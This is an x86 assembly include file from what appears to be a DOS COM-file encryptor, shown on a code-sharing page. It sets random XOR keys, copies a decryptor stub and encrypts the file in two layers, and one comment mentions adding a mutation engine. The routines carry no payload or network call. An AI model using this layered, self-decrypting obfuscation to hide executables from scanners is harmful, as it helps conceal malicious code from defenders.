📄 m_cset.inc
字号:
; this file sets the last variables in the com decryptor, copies it
; from ds:100 to fs:100 and encrypts the layers in reverse order.
; in later versions, all this is done much more elegantly,
; and this is the place where a mte should be included.
CryptBuffer proc
call CheckReg ; generate checksum over regstring
call SetLastVars ; fill variables in decryptor
mov cx, scramlength
push es
push fs
pop es
mov di, offset cbuffer
mov si, offset scram_b
cld
rep movsb ; move decryptor to begin buffer
pop es
call EncryptFile ; crypt child
push cs
pop ds
call CryptLayer2 ; crypt layer 2 before 1
call CryptLayer1 ; crypt layer 1 before write
retn
endp CryptBuffer
; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪
setLastVars proc ; set some last variables
mov ax,0ff
call rand_num
mov [xor1b],al
mov ax,0ffff
call rand_num
mov [xor2d],ax
mov ax,0ffff
call rand_num
mov [xor3d],ax
mov ax,0ff
call rand_num
mov byte ptr [xor4],al
retn
endp setLastVars
; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪
encryptfile proc
mov si,di
mov dx, [xor2d]
mov bx, [xor3d]
mov cx, [filelength]
shr cx,1
push fs fs
pop ds es
sprong: lodsw
add bx,0F34Ah
xor ax,bx
xchg ah,al
ror ax,3
stosw
loop sprong
push cs cs
pop ds es
retn
endp encryptfile
; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪
CryptLayer1 proc ; CRYPT IN BUFFER!!
xor ax,ax
mov si,offset xor1_e
sub si,2
mov di,si
xor bx,bx
cli
std
push fs fs
pop ds es
x1b: lodsw ; encrypt first PUSH/LODS layer
add bx,13
xor ax,bx
rol al,2
xor ah,byte ptr cs:[xor1b]
stosw
cmp di,offset xor1_b
ja x1b
cld
sti
push cs cs
pop ds es
retn
endp CryptLayer1
; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪
CryptLayer2 proc ; CRYPT IN BUFFER!!
mov bp,offset xor2_e
mov al,byte ptr [xor4]
push fs
pop ds
xor2e: dec bp
xor byte ptr ds:[bp], al
cmp bp,offset xor2_b
ja xor2e
push cs
pop ds
retn
endp CryptLayer2
; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -